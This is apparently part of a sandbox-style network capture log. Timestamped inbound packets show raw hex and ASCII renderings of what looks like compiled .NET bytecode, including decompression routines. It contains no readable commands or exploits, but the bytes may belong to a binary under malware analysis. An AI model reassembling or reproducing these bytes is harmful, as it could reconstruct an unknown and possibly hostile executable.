2022-01-14 12:49:37 UTC	11	IN	Data Raw: 0a 2b 06 04 1b 58 25 0b 0a 04 1a 58 06 30 0f 03 15 2e 0b 02 03 04 05 28 55 00 00 06 2b 77 07 06 33 28 02 7e 37 00 00 04 17 62 05 2d 03 16 2b 01 17 58 19 28 4b 00 00 06 02 7e 2f 01 00 04 7e 30 01 00 04 28 4e 00 00 06 2b 4b 02 7e 38 00 00 04 17 62 05 2d 03 16 2b 01 17 58 19 28 4b 00 00 06 02 02 7b 63 00 00 04 7b 07 01 00 04 17 58 02 7b 64 00 00 04 7b 07 01 00 04 17 58 08 17 58 28 47 00 00 06 02 02 7b 60 00 00 04 02 7b 61 00 00 04 28 4e 00 00 06 02 28 42 00 00 06 05 2c 06 02 28 51 00 00 06 2a 00 00 00 13 30 05 00 f2 01 00 00 14 00 00 11 02 7b 4d 00 00 04 02 7b 5c 00 00 04 59 02 7b 5a 00 00 04 59 0d 09 2d 1c 02 7b 5a 00 00 04 2d 14 02 7b 5c 00 00 04 2d 0c 02 7b 49 00 00 04 0d 38 0b 01 00 00 09 15 33 09 09 17 59 0d 38 fe 00 00 00 02 7b 5a 00 00 04 02 7b 49 00 Data Ascii: +X%X0.(U+w3(~7b-+X(K~/~0(N+K~8b-+X(K{c{X{d{XX(G{`{a(N(B,(Q*0{M{\Y{ZY-{Z-{\-{I83Y8{Z{I
2022-01-14 12:49:37 UTC	13	IN	Data Raw: 02 7b 5c 00 00 04 17 59 7d 5c 00 00 04 02 02 7b 5a 00 00 04 17 58 7d 5a 00 00 04 07 39 33 fd ff ff 02 16 28 53 00 00 06 02 7b 42 00 00 04 7b 57 01 00 04 3a 1c fd ff ff 16 2a 02 03 1a fe 01 28 53 00 00 06 02 7b 42 00 00 04 7b 57 01 00 04 2d 08 03 1a 33 02 18 2a 16 2a 03 1a 2e 02 17 2a 19 2a 00 13 30 06 00 b6 03 00 00 1b 00 00 11 16 0a 02 7b 5c 00 00 04 7e 3f 00 00 04 2f 23 02 28 57 00 00 06 02 7b 5c 00 00 04 7e 3f 00 00 04 2f 05 03 2d 02 16 2a 02 7b 5c 00 00 04 39 31 03 00 00 02 7b 5c 00 00 04 7e 3d 00 00 04 3f 82 00 00 00 02 02 7b 50 00 00 04 02 7b 54 00 00 04 1f 1f 5f 62 02 7b 4c 00 00 04 02 7b 5a 00 00 04 7e 3d 00 00 04 17 59 58 91 20 ff 00 00 00 5f 61 02 7b 53 00 00 04 5f 7d 50 00 00 04 02 7b 4f 00 00 04 02 7b 50 00 00 04 92 20 ff ff 00 00 5f 0a 02 7b Data Ascii: {\Y}\{ZX}Z93(S{B{W:(S{B{W-3.0{\~?/#(W{\~?/-{\91{\~=?{P{T_b{L{Z~=YX _a{S_}P{O{P _{
2022-01-14 12:49:37 UTC	14	IN	Data Raw: 00 04 07 17 58 25 0b 91 02 7b 4c 00 00 04 08 17 58 25 0c 91 40 a7 00 00 00 02 7b 4c 00 00 04 07 17 58 25 0b 91 02 7b 4c 00 00 04 08 17 58 25 0c 91 40 8a 00 00 00 02 7b 4c 00 00 04 07 17 58 25 0b 91 02 7b 4c 00 00 04 08 17 58 25 0c 91 33 70 02 7b 4c 00 00 04 07 17 58 25 0b 91 02 7b 4c 00 00 04 08 17 58 25 0c 91 33 56 02 7b 4c 00 00 04 07 17 58 25 0b 91 02 7b 4c 00 00 04 08 17 58 25 0c 91 33 3c 02 7b 4c 00 00 04 07 17 58 25 0b 91 02 7b 4c 00 00 04 08 17 58 25 0c 91 33 22 02 7b 4c 00 00 04 07 17 58 25 0b 91 02 7b 4c 00 00 04 08 17 58 25 0c 91 33 08 07 11 08 3f 1f ff ff ff 7e 3e 00 00 04 11 08 07 59 59 0d 11 08 7e 3e 00 00 04 59 0b 09 11 04 31 2b 02 03 7d 5b 00 00 04 09 13 04 09 11 06 2f 3e 02 7b 4c 00 00 04 07 11 04 58 17 59 91 13 09 02 7b 4c 00 00 04 07 11 Data Ascii: X%{LX%@{LX%{LX%@{LX%{LX%3p{LX%{LX%3V{LX%{LX%3<{LX%{LX%3"{LX%{LX%3?~>YY~>Y1+}[/>{LXY{L
2022-01-14 12:49:37 UTC	15	IN	Data Raw: 00 04 5f 7d 50 00 00 04 16 0c 2b 63 02 02 7b 50 00 00 04 02 7b 54 00 00 04 1f 1f 5f 62 02 7b 4c 00 00 04 08 7e 3d 00 00 04 17 59 58 91 20 ff 00 00 00 5f 61 02 7b 53 00 00 04 5f 7d 50 00 00 04 02 7b 4e 00 00 04 08 02 7b 4b 00 00 04 5f 02 7b 4f 00 00 04 02 7b 50 00 00 04 92 9d 02 7b 4f 00 00 04 02 7b 50 00 00 04 08 68 9d 08 17 58 0c 08 06 7e 3d 00 00 04 59 31 93 16 2a 00 00 00 13 30 05 00 2f 04 00 00 20 00 00 11 02 7b 42 00 00 04 7b 55 01 00 04 2c 2b 02 7b 42 00 00 04 7b 51 01 00 04 2d 0d 02 7b 42 00 00 04 7b 53 01 00 04 2d 11 02 7b 43 00 00 04 7e 34 00 00 04 33 31 03 1a 2e 2d 02 7b 42 00 00 04 7e 30 00 00 04 1a 9a 7d 59 01 00 04 72 e3 05 00 70 02 7b 42 00 00 04 7b 59 01 00 04 28 42 00 00 0a 73 f3 00 00 06 7a 02 7b 42 00 00 04 7b 57 01 00 04 2d 1d 02 7b 42 Data Ascii: _}P+c{P{T_b{L~=YX _a{S_}P{N{K_{O{P{O{PhX~=Y1*0/ {B{U,+{B{Q-{B{S-{C~431.-{B~0}Yrp{B{Y(Bsz{B{W-{B
2022-01-14 12:49:37 UTC	17	IN	Data Raw: 80 38 00 00 04 16 80 39 00 00 04 17 80 3a 00 00 04 18 80 3b 00 00 04 1f 10 80 3c 00 00 04 19 80 3d 00 00 04 20 02 01 00 00 80 3e 00 00 04 7e 3e 00 00 04 7e 3d 00 00 04 58 17 58 80 3f 00 00 04 18 7e 2a 01 00 04 5a 17 58 80 40 00 00 04 20 00 01 00 00 80 41 00 00 04 2a 2e 02 03 04 1c 16 28 6b 00 00 06 2a 2e 02 03 04 05 16 28 6b 00 00 06 2a 2e 02 03 04 1c 05 28 6b 00 00 06 2a 8e 02 28 6f 00 00 0a 02 03 7d 78 00 00 04 02 03 04 05 20 9f 07 00 00 0e 04 73 00 01 00 06 7d 77 00 00 04 2a 32 02 7b 77 00 00 04 7b 41 01 00 04 2a 82 02 7b 79 00 00 04 2c 0b 72 c9 07 00 70 73 70 00 00 0a 7a 02 7b 77 00 00 04 03 7d 41 01 00 04 2a 32 02 7b 77 00 00 04 7b 47 01 00 04 2a 13 30 03 00 60 00 00 00 00 00 00 00 02 7b 79 00 00 04 2c 0b 72 c9 07 00 70 73 70 00 00 0a 7a 02 7b 77 00 Data Ascii: 89:;<= >~>~=XX?~ZX@ A.(k.(k.(k(o}x s}w2{w{A{y,rpspz{w}A2{w{G*0`{y,rpspz{w
2022-01-14 12:49:37 UTC	18	IN	Data Raw: 00 00 02 7b 7d 00 00 04 2c 0b 72 a9 08 00 70 73 70 00 00 0a 7a 02 7b 7c 00 00 04 7b 46 01 00 04 2c 0b 72 e5 07 00 70 73 f3 00 00 06 7a 03 20 00 04 00 00 2f 20 72 2b 08 00 70 03 8c 6a 00 00 01 20 00 04 00 00 8c 6a 00 00 01 28 71 00 00 0a 73 f3 00 00 06 7a 02 7b 7c 00 00 04 03 7d 47 01 00 04 2a 46 02 7b 7c 00 00 04 7b 3f 01 00 04 7b 54 01 00 04 2a 46 02 7b 7c 00 00 04 7b 3f 01 00 04 7b 58 01 00 04 2a 1b 30 02 00 41 00 00 00 00 00 00 00 02 7b 7d 00 00 04 2d 2e 03 2c 24 02 7b 7c 00 00 04 2c 1c 02 7b 7c 00 00 04 6f 72 00 00 0a 02 02 7b 7c 00 00 04 6f ff 00 00 06 7d 81 00 00 04 02 17 7d 7d 00 00 04 de 08 02 03 28 73 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 00 00 38 38 00 08 00 00 00 00 92 02 7b 7d 00 00 04 2c 0b 72 a9 08 00 70 73 70 00 00 0a 7a 02 7b 7c 00 00 Data Ascii: {},rpspz{\|{F,rpsz / r+pj j(qsz{\|}GF{\|{?{TF{\|{?{X0A{}-.,${\|,{\|or{\|o}}}(s88{},rpspz{\|
2022-01-14 12:49:37 UTC	19	IN	Data Raw: 00 00 01 7d 8b 00 00 04 02 17 8d 6a 00 00 01 7d 8c 00 00 04 02 73 ae 00 00 06 7d 8d 00 00 04 02 73 c3 00 00 06 7d 99 00 00 04 02 28 1e 00 00 0a 02 03 7d 8f 00 00 04 02 20 e0 10 00 00 8d 6a 00 00 01 7d 92 00 00 04 02 05 8d 6c 00 00 01 7d 93 00 00 04 02 05 7d 94 00 00 04 02 04 7d 97 00 00 04 02 16 7d 86 00 00 04 02 28 a6 00 00 06 26 2a 13 30 07 00 51 00 00 00 24 00 00 11 02 7b 98 00 00 04 02 16 7d 86 00 00 04 02 16 7d 90 00 00 04 02 16 7d 91 00 00 04 02 02 16 25 0a 7d 96 00 00 04 06 7d 95 00 00 04 02 7b 97 00 00 04 2c 1d 02 7b 8f 00 00 04 02 16 14 16 16 28 fc 00 00 06 25 0b 7d 98 00 00 04 07 7d 5c 01 00 04 2a 00 00 00 13 30 0a 00 59 0f 00 00 25 00 00 11 02 7b 8f 00 00 04 7b 52 01 00 04 0d 02 7b 8f 00 00 04 7b 53 01 00 04 13 04 02 7b 91 00 00 04 0b 02 7b 90 Data Ascii: }j}s}s}(} j}l}}}}(&0Q${}}}%}}{,{(%}}\0Y%{{R{{S{{
2022-01-14 12:49:37 UTC	21	IN	Data Raw: 13 06 11 05 02 7b 94 00 00 04 33 2d 02 7b 95 00 00 04 2c 25 16 13 05 11 05 02 7b 95 00 00 04 32 0b 02 7b 94 00 00 04 11 05 59 2b 0b 02 7b 95 00 00 04 11 05 59 17 59 13 06 11 06 2d 57 02 07 7d 91 00 00 04 02 08 7d 90 00 00 04 02 7b 8f 00 00 04 11 04 7d 53 01 00 04 02 7b 8f 00 00 04 25 7b 54 01 00 04 09 02 7b 8f 00 00 04 7b 52 01 00 04 59 6a 58 7d 54 01 00 04 02 7b 8f 00 00 04 09 7d 52 01 00 04 02 11 05 7d 96 00 00 04 02 03 28 ab 00 00 06 2a 16 10 01 02 7b 87 00 00 04 0a 06 11 04 31 03 11 04 0a 06 11 06 31 03 11 06 0a 02 7b 8f 00 00 04 7b 51 01 00 04 09 02 7b 93 00 00 04 11 05 06 28 6e 00 00 0a 09 06 58 0d 11 04 06 59 13 04 11 05 06 58 13 05 11 06 06 59 13 06 02 02 7b 87 00 00 04 06 59 25 13 0d 7d 87 00 00 04 11 0d 3a d5 fa ff ff 02 02 7b 8e 00 00 04 2d 03 Data Ascii: {3-{,%{2{Y+{YY-W}}{}S{%{T{{RYjX}T{}R}(*{11{{Q{(nXYXY{Y%}:{-
2022-01-14 12:49:37 UTC	22	IN	Data Raw: 00 00 04 11 0d 11 10 9e 38 cf fe ff ff 11 10 1f 12 2e 07 11 10 1f 0e 59 2b 01 1d 13 0e 11 10 1f 12 2e 03 19 2b 02 1f 0b 13 0f 38 89 00 00 00 11 04 2c 05 16 10 01 2b 57 02 07 7d 91 00 00 04 02 08 7d 90 00 00 04 02 7b 8f 00 00 04 11 04 7d 53 01 00 04 02 7b 8f 00 00 04 25 7b 54 01 00 04 09 02 7b 8f 00 00 04 7b 52 01 00 04 59 6a 58 7d 54 01 00 04 02 7b 8f 00 00 04 09 7d 52 01 00 04 02 11 05 7d 96 00 00 04 02 03 28 ab 00 00 06 2a 11 04 17 59 13 04 07 02 7b 8f 00 00 04 7b 51 01 00 04 09 25 17 58 0d 91 20 ff 00 00 00 5f 08 1f 1f 5f 62 60 0b 08 1e 58 0c 08 06 11 0e 58 3f 6d ff ff ff 07 06 1f 1f 5f 63 0b 08 06 59 0c 11 0f 07 7e 9a 00 00 04 11 0e 94 5f 58 13 0f 07 11 0e 1f 1f 5f 63 0b 08 11 0e 59 0c 02 7b 89 00 00 04 13 0e 02 7b 88 00 00 04 0a 11 0e 11 0f 58 20 02 Data Ascii: 8.Y+.+8,+W}}{}S{%{T{{RYjX}T{}R}(*Y{{Q%X __b`XX?m_cY~_X_cY{{X
2022-01-14 12:49:37 UTC	23	IN	Data Raw: 11 05 7d 96 00 00 04 02 03 28 ab 00 00 06 2a 5a 02 28 a6 00 00 06 26 02 14 7d 93 00 00 04 02 14 7d 92 00 00 04 2a 13 30 05 00 20 00 00 00 13 00 00 11 03 04 02 7b 93 00 00 04 16 05 28 6e 00 00 0a 02 02 05 25 0a 7d 96 00 00 04 06 7d 95 00 00 04 2a 36 02 7b 86 00 00 04 17 2e 02 16 2a 17 2a 00 00 13 30 06 00 54 01 00 00 26 00 00 11 16 0b 38 44 01 00 00 07 2d 26 02 7b 95 00 00 04 02 7b 96 00 00 04 31 08 02 7b 94 00 00 04 2b 06 02 7b 96 00 00 04 02 7b 95 00 00 04 59 0a 2b 0e 02 7b 96 00 00 04 02 7b 95 00 00 04 59 0a 06 2d 0a 03 1f fb 33 03 16 10 01 03 2a 06 02 7b 8f 00 00 04 7b 57 01 00 04 31 0c 02 7b 8f 00 00 04 7b 57 01 00 04 0a 06 2c 08 03 1f fb 33 03 16 10 01 02 7b 8f 00 00 04 25 7b 57 01 00 04 06 59 7d 57 01 00 04 02 7b 8f 00 00 04 25 7b 58 01 00 04 06 6a Data Ascii: }(Z(&}}0 {(n%}}6{.0T&8D-&{{1{+{{Y+{{Y-3{{W1{{W,3{%{WY}W{%{Xj
2022-01-14 12:49:37 UTC	25	IN	Data Raw: 06 7d 53 01 00 04 11 0a 25 7b 54 01 00 04 11 05 11 0a 7b 52 01 00 04 59 6a 58 7d 54 01 00 04 11 0a 11 05 7d 52 01 00 04 03 11 07 7d 96 00 00 04 03 04 6f ab 00 00 06 2a 02 7b ab 00 00 04 0a 2b 7d 11 06 2c 05 16 10 02 2b 4a 03 09 7d 91 00 00 04 03 11 04 7d 90 00 00 04 11 0a 11 06 7d 53 01 00 04 11 0a 25 7b 54 01 00 04 11 05 11 0a 7b 52 01 00 04 59 6a 58 7d 54 01 00 04 11 0a 11 05 7d 52 01 00 04 03 11 07 7d 96 00 00 04 03 04 6f ab 00 00 06 2a 11 06 17 59 13 06 09 11 0a 7b 51 01 00 04 11 05 25 17 58 13 05 91 20 ff 00 00 00 5f 11 04 1f 1f 5f 62 60 0d 11 04 1e 58 13 04 11 04 06 3f 7b ff ff ff 02 02 7b a6 00 00 04 09 7e 9a 00 00 04 06 94 5f 58 7d a6 00 00 04 09 06 1f 1f 5f 63 0d 11 04 06 59 13 04 02 02 7b ae 00 00 04 7d a9 00 00 04 02 02 7b b1 00 00 04 7d a7 00 Data Ascii: }S%{T{RYjX}T}R}o{+},+J}}}S%{T{RYjX}T}R}oY{Q%X __b`X?{{~_X}_cY{}{}
2022-01-14 12:49:37 UTC	26	IN	Data Raw: 0b 03 7b 94 00 00 04 11 07 59 2b 0b 03 7b 95 00 00 04 11 07 59 17 59 13 08 11 08 2d 4a 03 09 7d 91 00 00 04 03 11 04 7d 90 00 00 04 11 0a 11 06 7d 53 01 00 04 11 0a 25 7b 54 01 00 04 11 05 11 0a 7b 52 01 00 04 59 6a 58 7d 54 01 00 04 11 0a 11 05 7d 52 01 00 04 03 11 07 7d 96 00 00 04 03 04 6f ab 00 00 06 2a 16 10 02 03 7b 93 00 00 04 11 07 25 17 58 13 07 02 7b aa 00 00 04 d2 9c 11 08 17 59 13 08 02 16 7d a5 00 00 04 38 48 f7 ff ff 11 04 1d 31 12 11 04 1e 59 13 04 11 06 17 58 13 06 11 05 17 59 13 05 03 11 07 7d 96 00 00 04 03 04 6f ab 00 00 06 10 02 03 7b 96 00 00 04 13 07 11 07 03 7b 95 00 00 04 32 0b 03 7b 94 00 00 04 11 07 59 2b 0b 03 7b 95 00 00 04 11 07 59 17 59 13 08 03 7b 95 00 00 04 03 7b 96 00 00 04 2e 4a 03 09 7d 91 00 00 04 03 11 04 7d 90 00 00 Data Ascii: {Y+{YY-J}}}S%{T{RYjX}T}R}o*{%X{Y}8H1YXY}o{{2{Y+{YY{{.J}}
2022-01-14 12:49:37 UTC	27	IN	Data Raw: 11 08 11 0e 59 16 31 35 11 0c 11 08 11 0e 59 31 2c 0e 07 7b 93 00 00 04 11 08 25 17 58 13 08 0e 07 7b 93 00 00 04 11 0e 25 17 58 13 0e 91 9c 11 0c 17 59 25 13 0c 2d d9 38 5b 02 00 00 0e 07 7b 93 00 00 04 11 0e 0e 07 7b 93 00 00 04 11 08 11 0c 28 6e 00 00 0a 11 08 11 0c 58 13 08 11 0e 11 0c 58 13 0e 16 13 0c 38 2c 02 00 00 09 1f 40 5f 2d 27 06 07 11 0f 18 58 94 58 0a 06 11 04 7e 9a 00 00 04 09 94 5f 58 0a 08 06 58 19 5a 13 0f 07 11 0f 94 0d 38 c0 fd ff ff 0e 08 72 0b 0a 00 70 7d 59 01 00 04 0e 08 7b 53 01 00 04 11 07 59 13 0c 11 05 19 63 11 0c 32 04 11 0c 2b 04 11 05 19 63 13 0c 11 07 11 0c 58 13 07 11 06 11 0c 59 13 06 11 05 11 0c 19 62 59 13 05 0e 07 11 04 7d 91 00 00 04 0e 07 11 05 7d 90 00 00 04 0e 08 11 07 7d 53 01 00 04 0e 08 25 7b 54 01 00 04 11 06 Data Ascii: Y15Y1,{%X{%XY%-8[{{(nXX8,@_-'XX~_XXZ8rp}Y{SYc2+cXYbY}}}S%{T
2022-01-14 12:49:37 UTC	29	IN	Data Raw: 00 00 04 31 38 02 1f 0d 7d b5 00 00 04 02 7b b6 00 00 04 72 d1 0a 00 70 02 7b b7 00 00 04 1a 63 1e 58 8c 6a 00 00 01 28 42 00 00 0a 7d 59 01 00 04 02 1b 7d ba 00 00 04 38 ca fe ff ff 02 17 7d b5 00 00 04 38 be fe ff ff 02 7b b6 00 00 04 7b 53 01 00 04 2d 02 08 2a 07 0c 02 7b b6 00 00 04 25 7b 53 01 00 04 17 59 7d 53 01 00 04 02 7b b6 00 00 04 25 7b 54 01 00 04 17 6a 58 7d 54 01 00 04 02 7b b6 00 00 04 7b 51 01 00 04 02 7b b6 00 00 04 25 7b 52 01 00 04 13 04 11 04 17 58 7d 52 01 00 04 11 04 91 20 ff 00 00 00 5f 0a 02 7b b7 00 00 04 1e 62 06 58 1f 1f 5d 2c 24 02 1f 0d 7d b5 00 00 04 02 7b b6 00 00 04 72 05 0b 00 70 7d 59 01 00 04 02 1b 7d ba 00 00 04 38 27 fe ff ff 02 06 1f 20 5f 2c 03 18 2b 01 1d 7d b5 00 00 04 38 12 fe ff ff 02 7b b6 00 00 04 7b 53 01 00 Data Ascii: 18}{rp{cXj(B}Y}8}8{{S-*{%{SY}S{%{TjX}T{{Q{%{RX}R _{bX],$}{rp}Y}8' _,+}8{{S
2022-01-14 12:49:37 UTC	30	IN	Data Raw: b9 00 00 04 02 7b b8 00 00 04 02 7b b9 00 00 04 2e 24 02 1f 0d 7d b5 00 00 04 02 7b b6 00 00 04 72 33 0b 00 70 7d 59 01 00 04 02 1b 7d ba 00 00 04 38 6f f9 ff ff 02 1f 0c 7d b5 00 00 04 17 2a 17 2a 72 5d 0b 00 70 02 7b b6 00 00 04 7b 59 01 00 04 28 42 00 00 0a 73 f3 00 00 06 7a 72 c7 05 00 70 73 f3 00 00 06 7a 13 30 05 00 85 00 00 00 15 00 00 11 16 0a 03 8e 69 0b 04 2d 2f 02 7b b5 00 00 04 1c 2e 0b 72 c7 05 00 70 73 f3 00 00 06 7a 17 03 16 03 8e 69 28 fc 00 00 06 02 7b b6 00 00 04 7b 5c 01 00 04 2e 03 1f fd 2a 02 7b b6 00 00 04 16 14 16 16 28 fc 00 00 06 7d 5c 01 00 04 07 17 02 7b bc 00 00 04 1f 1f 5f 62 32 14 17 02 7b bc 00 00 04 1f 1f 5f 62 17 59 0b 03 8e 69 07 59 0a 02 7b bd 00 00 04 03 06 07 6f a9 00 00 06 02 1d 7d b5 00 00 04 16 2a 00 00 00 13 30 04 Data Ascii: {{.$}{r3p}Y}8o}*r]p{{Y(Bszrpsz0i-/{.rpszi({{\.{(}\{_b2{_bYiY{o}*0
2022-01-14 12:49:37 UTC	31	IN	Data Raw: 00 00 32 04 1f 60 2b 01 16 67 9e 02 7b d5 00 00 04 18 0e 0b 11 09 25 17 58 13 09 94 9e 2b 32 02 7b d5 00 00 04 16 0e 06 0e 0b 11 09 94 0e 04 59 94 1f 10 58 1f 40 58 67 9e 02 7b d5 00 00 04 18 0e 05 0e 0b 11 09 25 17 58 13 09 94 0e 04 59 94 9e 17 11 06 11 0b 59 1f 1f 5f 62 0b 11 04 11 0b 28 f4 00 00 06 13 05 2b 1c 02 7b d5 00 00 04 16 0e 09 11 0a 11 05 58 19 5a 19 28 6e 00 00 0a 11 05 07 58 13 05 11 05 11 0e 32 de 17 11 06 17 59 1f 1f 5f 62 13 05 2b 11 11 04 11 05 61 13 04 11 05 17 28 f4 00 00 06 13 05 11 04 11 05 5f 2d e8 11 04 11 05 61 13 04 17 11 0b 1f 1f 5f 62 17 59 13 08 2b 16 09 17 59 0d 11 0b 11 07 59 13 0b 17 11 0b 1f 1f 5f 62 17 59 13 08 11 04 11 08 5f 02 7b d7 00 00 04 09 94 33 db 06 25 17 59 0a 3a c7 fe ff ff 11 06 17 58 13 06 11 06 08 3e 93 fd Data Ascii: 2`+g{%X+2{YX@Xg{%XYY_b(+{XZ(nX2Y_b+a(_-a_bY+YY_bY_{3%Y:X>
2022-01-14 12:49:37 UTC	33	IN	Data Raw: 00 04 00 00 2f 10 72 9d 0d 00 70 72 b3 0d 00 70 73 8a 00 00 0a 7a 02 03 7d e7 00 00 04 2a 1e 02 7b f0 00 00 04 2a 1e 02 7b f5 00 00 04 2a 00 00 13 30 05 00 a9 00 00 00 15 00 00 11 02 73 8b 00 00 0a 7d f3 00 00 04 02 73 8b 00 00 0a 7d f4 00 00 04 02 73 8c 00 00 0a 7d e2 00 00 04 7e e1 00 00 04 28 8d 00 00 0a 5a 0a 06 02 7b e6 00 00 04 28 8e 00 00 0a 0a 16 0b 2b 33 02 7b e2 00 00 04 02 7b e7 00 00 04 02 7b f6 00 00 04 02 28 cb 00 00 06 07 73 c5 00 00 06 6f 8f 00 00 0a 02 7b f4 00 00 04 07 6f 90 00 00 0a 07 17 58 0b 07 06 32 c9 02 16 73 91 00 00 0a 7d e8 00 00 04 02 73 59 01 00 06 7d f1 00 00 04 02 15 7d ec 00 00 04 02 15 7d ed 00 00 04 02 15 7d ee 00 00 04 02 15 7d ef 00 00 04 2a 00 00 00 13 30 05 00 4d 01 00 00 2c 00 00 11 16 0a 02 7b ea 00 00 04 2c 06 73 Data Ascii: /rprpsz}{{0s}s}s}~(Z{(+3{{{(so{oX2s}sY}}}}}0M,{,s
2022-01-14 12:49:37 UTC	34	IN	Data Raw: 6f 92 00 00 0a 16 31 0c 02 7b f3 00 00 04 6f 93 00 00 0a 0c de 0c 02 7b f3 00 00 04 28 9e 00 00 0a dc 08 16 3f da 00 00 00 02 7b e2 00 00 04 08 6f 94 00 00 0a 0d 09 7b dc 00 00 04 02 7b ee 00 00 04 17 58 2e 4a 02 7b f3 00 00 04 13 04 16 13 05 11 04 12 05 28 9f 00 00 0a 02 7b f3 00 00 04 08 6f 90 00 00 0a de 0c 11 05 2c 07 11 04 28 9e 00 00 0a dc 06 08 33 10 02 7b e8 00 00 04 6f 9c 00 00 0a 26 15 0a 2b 7b 06 15 33 77 08 0a 2b 73 15 0a 02 7b e5 00 00 04 09 7b d9 00 00 04 16 09 7b de 00 00 04 6f 79 00 00 0a 02 7b f1 00 00 04 09 7b da 00 00 04 09 7b dd 00 00 04 6f 58 01 00 06 02 02 7b f5 00 00 04 09 7b dd 00 00 04 6a 58 7d f5 00 00 04 09 16 7d dd 00 00 04 02 09 7b dc 00 00 04 7d ee 00 00 04 02 7b f4 00 00 04 09 7b db 00 00 04 6f 90 00 00 0a 07 15 33 06 16 0b Data Ascii: o1{o{(?{o{{X.J{({o,(3{o&+{3w+s{{{oy{{{oX{{jX}}{}{{o3
2022-01-14 12:49:37 UTC	35	IN	Data Raw: 30 9d 11 04 13 08 2b 72 03 7b 66 00 00 04 11 08 92 13 06 2b 5b 03 7b 67 00 00 04 11 05 17 59 25 13 05 94 13 07 11 07 02 7b 07 01 00 04 30 41 06 11 07 18 5a 17 58 92 11 08 2e 2f 03 03 7b 6f 00 00 04 6a 11 08 6a 06 11 07 18 5a 17 58 92 6a 59 06 11 07 18 5a 92 6a 5a 58 69 7d 6f 00 00 04 06 11 07 18 5a 17 58 11 08 68 9d 11 06 17 59 13 06 11 06 2d a1 11 08 17 59 13 08 11 08 2d 8a 2a 00 13 30 06 00 33 02 00 00 35 00 00 11 02 7b 06 01 00 04 0a 02 7b 08 01 00 04 7b 34 01 00 04 0b 02 7b 08 01 00 04 7b 37 01 00 04 0c 15 13 05 03 16 7d 68 00 00 04 03 7e fc 00 00 04 7d 69 00 00 04 16 0d 2b 3d 06 09 18 5a 92 2c 2a 03 7b 67 00 00 04 03 25 7b 68 00 00 04 17 58 13 07 11 07 7d 68 00 00 04 11 07 09 25 13 05 9e 03 7b 6a 00 00 04 09 16 9c 2b 08 06 09 18 5a 17 58 16 9d 09 17 Data Ascii: 0+r{f+[{gY%{0AZX./{ojjZXjYZjZXi}oZXhY-Y-035{{{4{{7}h~}i+=Z,{g%{hX}h%{j+ZX
2022-01-14 12:49:37 UTC	37	IN	Data Raw: 00 00 0a 80 2f 01 00 04 1f 3c 8d 69 00 00 01 25 d0 65 03 00 04 28 89 00 00 0a 80 30 01 00 04 7e 2f 01 00 04 7e fd 00 00 04 7e 28 01 00 04 17 58 7e 2a 01 00 04 7e 25 01 00 04 73 fa 00 00 06 80 31 01 00 04 7e 30 01 00 04 7e fe 00 00 04 16 7e 27 01 00 04 7e 25 01 00 04 73 fa 00 00 06 80 32 01 00 04 14 7e ff 00 00 04 16 7e 26 01 00 04 7e 2b 01 00 04 73 fa 00 00 06 80 33 01 00 04 2a 00 00 00 13 30 05 00 6c 01 00 00 38 00 00 11 03 2d 02 17 2a 02 20 ff ff 00 00 5f 0a 02 1f 10 64 20 ff ff 00 00 5f 0b 38 41 01 00 00 05 7e 3a 01 00 04 32 07 7e 3a 01 00 04 2b 01 05 0c 05 08 59 10 03 38 f5 00 00 00 06 03 04 25 17 58 10 02 91 58 0a 07 06 58 0b 06 03 04 25 17 58 10 02 91 58 0a 07 06 58 0b 06 03 04 25 17 58 10 02 91 58 0a 07 06 58 0b 06 03 04 25 17 58 10 02 91 58 0a 07 Data Ascii: /<i%e(0~/~~(X~~%s1~0~~'~%s2~~&~+s30l8-* _d _8A~:2~:+Y8%XXX%XXX%XXX%XX
2022-01-14 12:49:37 UTC	38	IN	Data Raw: 04 7b 59 01 00 04 2d 17 72 d5 0e 00 70 08 07 8c 6a 00 00 01 28 71 00 00 0a 73 f3 00 00 06 7a 08 72 f5 0e 00 70 02 7b 3f 01 00 04 7b 59 01 00 04 28 37 00 00 0a 73 f3 00 00 06 7a 02 7b 46 01 00 04 8e 69 02 7b 3f 01 00 04 7b 57 01 00 04 59 16 31 26 02 7b 49 01 00 04 02 7b 46 01 00 04 16 02 7b 46 01 00 04 8e 69 02 7b 3f 01 00 04 7b 57 01 00 04 59 6f 79 00 00 0a 02 7b 3f 01 00 04 7b 53 01 00 04 2d 10 02 7b 3f 01 00 04 7b 57 01 00 04 16 fe 03 2b 01 16 0a 02 7b 42 01 00 04 20 a0 07 00 00 33 28 02 28 01 01 00 06 2d 20 02 7b 3f 01 00 04 7b 53 01 00 04 1e 33 10 02 7b 3f 01 00 04 7b 57 01 00 04 16 fe 03 2b 01 16 0a 06 39 b0 fe ff ff 02 6f 76 00 00 0a 02 7b 42 01 00 04 20 a0 07 00 00 40 c7 01 00 00 02 28 01 01 00 06 2c 45 02 7b 4b 01 00 04 6f 4b 01 00 06 0d 02 7b 49 Data Ascii: {Y-rpj(qszrp{?{Y(7sz{Fi{?{WY1&{I{F{Fi{?{WYoy{?{S-{?{W+{B 3((- {?{S3{?{W+9ov{B @(,E{KoK{I
2022-01-14 12:49:37 UTC	40	IN	Data Raw: 16 2a 02 7b 50 01 00 04 2c 0a 02 28 01 01 00 06 2c 02 16 2a 03 2d 0b 72 75 12 00 70 73 63 00 00 0a 7a 05 16 2f 0b 72 83 12 00 70 73 b4 00 00 0a 7a 04 03 16 6f b5 00 00 0a 2f 0b 72 8f 12 00 70 73 b4 00 00 0a 7a 04 05 58 03 16 6f b6 00 00 0a 31 0b 72 83 12 00 70 73 b4 00 00 0a 7a 16 0a 02 7b 3f 01 00 04 03 7d 55 01 00 04 02 7b 3f 01 00 04 04 7d 56 01 00 04 02 7b 3f 01 00 04 05 7d 57 01 00 04 02 7b 3f 01 00 04 02 28 03 01 00 06 7d 51 01 00 04 02 7b 3f 01 00 04 7b 53 01 00 04 2d 4d 02 7b 50 01 00 04 2d 45 02 7b 3f 01 00 04 16 7d 52 01 00 04 02 7b 3f 01 00 04 02 7b 49 01 00 04 02 7b 46 01 00 04 16 02 7b 46 01 00 04 8e 69 6f 78 00 00 0a 7d 53 01 00 04 02 7b 3f 01 00 04 7b 53 01 00 04 2d 07 02 17 7d 50 01 00 04 02 28 01 01 00 06 2d 13 02 7b 3f 01 00 04 02 7b 41 Data Ascii: {P,(,-rupscz/rpszo/rpszXo1rpsz{?}U{?}V{?}W{?(}Q{?{S-M{P-E{?}R{?{I{F{Fiox}S{?{S-}P(-{?{A
